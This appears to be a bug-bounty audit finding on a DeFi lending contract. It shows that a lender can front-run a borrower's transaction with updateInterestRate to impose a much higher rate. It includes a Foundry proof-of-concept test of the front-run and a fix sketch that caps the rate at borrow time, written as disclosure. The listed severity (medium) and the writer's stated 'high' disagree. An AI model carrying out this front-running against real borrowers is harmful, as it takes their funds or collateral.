20,000 USDC
Submission Details
Severity: medium
Valid

A lender can front-run and charge more interest than the prearranged amount

Summary

A malicious lender can create a pool with an interest rate low enough to entice borrowers, then front-run a borrower's transaction and raise the rate to the maximum allowed using the updateInterestRate function.

Vulnerability Details

function testBorrow() public {
    /*------------------- SetPool --------------------------------------------------*/
    vm.startPrank(lender1);
    Pool memory p = Pool({
        lender: lender1,
        loanToken: address(loanToken),
        collateralToken: address(collateralToken),
        minLoanSize: 100*10**18,
        poolBalance: 1000*10**18,
        maxLoanRatio: 2*10**18,
        auctionLength: 1 days,
        interestRate: 1000,
        outstandingLoans: 0
    });
    bytes32 poolId = lender.setPool(p);
    (,,,,uint256 poolBalance,,,,) = lender.pools(poolId);
    assertEq(poolBalance, 1000*10**18);
    (,,,,,,,uint interes,) = lender.pools(poolId);
    assertEq(interes, 1000);
    /* On seeing the borrower's transaction in the mempool, the lender front-runs it with the following call: */
    lender.updateInterestRate(poolId, 90000);
    (,,,,,,,interes,) = lender.pools(poolId);
    assertEq(interes, 90000);
    /*------------------- Borrow --------------------------------------------------*/
    vm.startPrank(borrower);
    Borrow memory b = Borrow({
        poolId: poolId,
        debt: 100*10**18,
        collateral: 100*10**18
    });
    Borrow[] memory borrows = new Borrow[](1);
    borrows[0] = b;
    lender.borrow(borrows);
    /* The borrow succeeds at the raised rate: the borrower is now bound to 90000 instead of the 1000 they saw */
    assertEq(loanToken.balanceOf(address(borrower)), 995*10**17);
    assertEq(collateralToken.balanceOf(address(lender)), 100*10**18);
    (,,,,poolBalance,,,,) = lender.pools(poolId);
    assertEq(poolBalance, 900*10**18);
}

1- The lender creates a pool with a low interest rate

2- A borrower sees this and takes a loan

3- The lender sees the borrower's transaction in the mempool and front-runs it so that its updateInterestRate call executes first

Impact

I mark this problem as high because afterwards the borrower can either pay the high interest or be liquidated and lose their collateral; in either case the borrower suffers a loss of funds.

Tools Used

Manual Review

Recommendations

Change the logic of how this works. Consider adding a parameter to the borrow function indicating the maximum interest rate a borrower is willing to accept.
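As an added illustration of this recommendation (not the project's own contract), a stripped-down Solidity sketch in which the Borrow struct carries a maxInterestRate that borrow() checks against the pool's current rate before any accounting; the Pool and Borrow fields, the pool-id scheme and the Borrowed event are simplified assumptions:

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Simplified, assumed sketch of the pool/borrow flow (not the project's contract):
// only the fields needed to show the borrower-side interest cap are kept.
struct Pool {
    address lender;
    uint256 poolBalance;
    uint256 interestRate;    // basis points, as in the report's test (1000 = 10%)
}

struct Borrow {
    bytes32 poolId;
    uint256 debt;
    uint256 collateral;
    uint256 maxInterestRate; // added field: highest rate the borrower agrees to
}

contract LenderWithRateCap {
    mapping(bytes32 => Pool) public pools;

    event Borrowed(address indexed borrower, bytes32 indexed poolId, uint256 debt, uint256 rate);
    error RateAboveBorrowerMax(uint256 poolRate, uint256 accepted);

    function setPool(Pool calldata p) external returns (bytes32 poolId) {
        poolId = keccak256(abi.encode(p.lender, block.timestamp)); // hypothetical id scheme
        pools[poolId] = p;
    }

    function updateInterestRate(bytes32 poolId, uint256 rate) external {
        require(msg.sender == pools[poolId].lender, "not lender");
        pools[poolId].interestRate = rate;
    }

    function borrow(Borrow[] calldata borrows) external {
        for (uint256 i = 0; i < borrows.length; i++) {
            Borrow calldata b = borrows[i];
            Pool storage pool = pools[b.poolId];
            // If the lender's updateInterestRate lands first, the pool rate no longer
            // matches what the borrower signed for and the whole call reverts.
            if (pool.interestRate > b.maxInterestRate) {
                revert RateAboveBorrowerMax(pool.interestRate, b.maxInterestRate);
            }
            pool.poolBalance -= b.debt; // checked arithmetic: reverts if the pool cannot fund it
            // Token transfers are omitted; the loan is recorded at the rate the borrower accepted.
            emit Borrowed(msg.sender, b.poolId, b.debt, pool.interestRate);
        }
    }
}
```

Against the sequence in the test above, a borrower submitting maxInterestRate: 1000 would see the front-run updateInterestRate(poolId, 90000) turn their borrow into a revert with RateAboveBorrowerMax instead of a loan at 90000.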
